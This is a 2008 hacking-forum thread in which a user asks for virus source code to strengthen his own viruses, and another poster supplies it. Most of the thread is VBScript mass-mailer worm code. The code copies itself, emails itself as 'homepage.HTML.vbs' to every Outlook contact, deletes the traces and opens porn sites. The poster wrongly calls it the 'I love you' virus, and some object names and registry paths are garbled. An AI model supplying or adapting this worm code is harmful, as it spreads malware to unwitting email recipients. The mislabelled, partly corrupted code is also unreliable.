Title

body
 
xxx of yyy characters
HACKERS

Watch this Topic   watch
Messages 

1-3 of 3

Close Topic

Reason

Message



 
Topic: rani i need help to make virus
i need code source of virus program to perform it.
j'ai besoin du code source d'un virus pour l'améliorer.quelqu'un peut il se poter volontaire pour me l'apporter car tous mes virus créer sont faibles.
i need virus source. jet1_one84@hotmail.com
Apr 4, 2008
5:04 AM
fake virus?..or a real one?:)
Apr 13, 2008
6:35 AM
Here is the source code of "I love you" virus.
On Error Resume Next
Set WS = CreateObject("W.Shell")
Set FSO= Createobject("ing.filesystemobject")
Folder=FSO.GetSpecialFolder(2)

Set InF=FSO.OpenTextFile(W.Fullname,1)
Do While InF.AtEndOfStream <>True
Buffer=Buffer&InF.ReadLine&vbcrlf
Loop

Set OutF=FSO.OpenTextFile(Folder&"homepage.HTML.vbs",2,true)
OutF.write Buffer
OutF.close
Set FSO=Nothing

If WS.regread ("HKCUsoftwareAnmailed") <> "1" then
Mailit()
End If

Set s=CreateObject("Outlook.Application")
Set t=s.GetNameSpace("MAPI")
Set u=t.GetDefaultFolder(6)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).close
u.Items.Item(i).delete
End If
Next
Set u=t.GetDefaultFolder(3)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).delete
End If
Next

Randomize
r=Int((4*Rnd)+1)
If r=1 then
WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm")
elseif r=2 Then
WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm")
elseif r=3 Then
WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm")
ElseIf r=4 Then
WS.Run("http://sheila.issexy.tv/1.htm")
End If

Function Mailit()
On Error Resume Next
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
Set Mapi=Outlook.GetNameSpace("MAPI")
Set Lists=Mapi.AddressLists
For Each ListIndex In Lists
If ListIndex.AddressEntries.Count <> 0 Then
ContactCount = ListIndex.AddressEntries.Count
For Count= 1 To ContactCount
Set Mail = Outlook.CreateItem(0)
Set Contact = ListIndex.AddressEntries(Count)
Mail.To = Contact.Address
Mail.Subject = "Homepage"
Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page!
It's really cool ;O)"&vbcrlf&vbcrlf
Set Attachment=Mail.Attachments
Attachment.Add Folder & "homepage.HTML.vbs"
Mail.DeleteAfterSubmit = True
If Mail.To <> "" Then
Mail.Send
WS.regwrite "HKCUsoftwareAnmailed", "1"
End If
Next
End If
Next
End if
End Function

by nT----not responsible for any damages to ur system.
Posted by NT™ 
Apr 24, 2008
11:22 PM
1-3 of 3


Select Language